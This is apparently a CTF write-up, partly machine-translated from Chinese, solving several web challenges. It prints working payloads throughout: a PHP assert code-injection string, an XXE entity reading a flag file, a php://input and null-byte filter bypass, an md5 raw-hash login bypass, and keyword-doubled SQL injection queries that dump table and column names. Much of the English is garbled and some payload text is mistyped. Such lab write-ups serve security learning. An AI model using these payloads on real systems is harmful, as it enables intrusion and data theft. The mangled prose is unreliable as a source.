babyphp
First, look at the source code right
out of the sand sculpture after url lost under? Page = fhlag, of course, do not see the results, but we can know flag.php this file from here
I saw GIT, GIT think of source code disclosure, with a bit Gangster tools to obtain the source code
you can see we want flag.php, of course, is no flag to open the
can get the code from index.php judge
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
See the assert () function code execution backhand a reading flag.php
small garbage after several tests with reference Gangster wp, get payload:?. Page = flag'.system ( ls) '
This will be flag'.system . (ls) 'as the strpos () of the first parameter
$file = "templates/" . "flag'.syatem(ls).'" . ".php";
assert("strpos('flag.'syatem(ls).'', '..') === false") or die("Detected hacking attempt!");
lists all the documents
then use cat command to read the file flag.php
obtained flag in the source
Conclusion: the code must be spliced good!
admin
No ideas, capturing Packet see there is no useful information, so he scanned the web directory
really have. . .
Cute robot saw it, go in and see
tips /admin_s3cr3t.php page
directly to the flag, and I thought what you want to continue looking
okay that I cheated. . . Wrong Answer trained, trained, trained,
and then capture a look, change the value of the next line admin
localhost
What IP addresses can be forged
PORT51
十分天真的用 http://web.jarvisoj.com:51/
试了试
其实应该是用公网ip端口访问,而不是改目的端口访问
windows用这个命令就行
curl --local-port 51 http://web.jarvisoj.com:32770/
但是服务器好像出了问题没有给flag
LOGIN
一开始眼瞎没有看到响应包的提示还进行爆破了…尬笑
也是第一次知道md5($pass,true)
具体原理参考:https://www.freebuf.com/column/150063.html写的超级棒!
输入ffifdyop得到flag
神盾局的秘密
通过审查元素大法发现图片来源为src="showimg.php?img=c2hpZWxkLmpwZw=="
,猜测任意文件读取漏洞
试着读取index.php,得到源码
应该是利用反序列化,先看下shield.php中Shield类的定义
接下来就是构造序列化字段了
经过我不太熟练的构造,get it~(查看源码可得)
WEB?
一开始看到这个登录框还以为是sql注入。。。抓包也没有发现什么提示
看源码又没看出个什么。。。看了大佬们的wp说是app.js有问题
复制在app.js搜索一下
再看下checkpass()
25元一次方程组,hhhhhh,笔算是不可能笔算的,上python
data = [81,87,66,123,82,51,97,99,55,95,49,115,95,105,110,116,101,114,101,115,116,105,110,103,125]
flag = ''
for i in data:
flag += chr(i)
print flag
结语:一直以为源码的js啥的没啥好看的,是我孤陋寡闻了
dbq又触及到我的知识盲区了
api调用
That is what the command injection code injection, is a read wp title
XXE vulnerability studied
, although recently to see, but look at all the principle has not practiced
]> Reference to an external file
1. Change capture type Content: file application / xml
2. inject code xml configuration, since the tips, with the view command system
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "/home/ctf/flag.txt" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>
I found a xml code. . . I will not write
In a mess
Right-get source code hint: index.phps
get the code in index.phps
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
header('Location: index.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'Hahahahahaha';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("flag.txt");
}
else
{
print "work harder!harder!harder!";
}
?>
The key point is:
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
id weak bypass type, a pseudo bypassing protocol, b using the characteristic (cutoff 00) eregi () function is bypassed
so payload:
?a=php://input&id=0a&b=%004qqqqq
POST:1112 is a nice lab!
To enter the catalog? ? ? id = 1 Is sql injection?
See add single quotation marks, and then if it does not
query the database name
? ID = -1 / 12 is / uniunionon / H / seselectlect / H / 1,2, (selselectect / H / context / H / frofromm / H / Content)% 23 is
burst table name
?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(table_name)/*h*/frofromm/*h*/information_schema.tables/*h*/where/*h*/table_schema=database())#
Burst column name, table name to the attention hex encoding
?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(column_name)/*h*/frofromm/*h*/information_schema.columns/*h*/where/*h*/table_name=0x636f6e74656e74)#
Reading content
?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(selselectect/*h*/context/*h*/frofromm/*h*/content)%23